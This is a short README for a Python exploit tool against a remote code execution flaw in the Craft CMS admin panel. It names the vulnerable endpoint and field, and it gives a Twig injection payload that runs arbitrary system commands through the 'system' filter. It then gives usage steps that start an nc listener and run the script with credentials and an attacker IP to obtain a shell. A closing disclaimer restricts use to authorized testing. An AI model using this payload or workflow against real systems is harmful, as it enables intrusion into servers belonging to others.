
Craft CMS RCE via relational conditionals in the control panel
Python exploit for a RCE vulnerability in the Craft CMS admin panel, triggered via the admin/actions/element-indexes/count-elements endpoint.
The injection goes through the elementIds field of a RelatedToConditionRule condition, which gets interpreted as Twig server-side and abused via the system filter to execute an arbitrary command ({{[['<cmd>']|filter('system')]}}).
Vulnerability disclosed by NeoSprings
Affected versions :
>= 5.0.0-RC1, <= 5.9.8>= 4.0.0-beta.1, <= 4.17.3References :
$ git clone https://github.com/0xTatsuki/CVE-2026-31857.git
$ cd CVE-2026-31857
$ pip install -r requirements.txt
$ nc -lvnp <attacker_port>
$ python3 CVE-2026-31857.py -t http://<craftcms_base_url> -u <username> -p <password> -i <attacker_ip> -P <attacker_port>
This tool is provided for educational purposes and authorized exercises only (CTF, contracted penetration testing or local testing). Using it against any system without explicit authorization is illegal.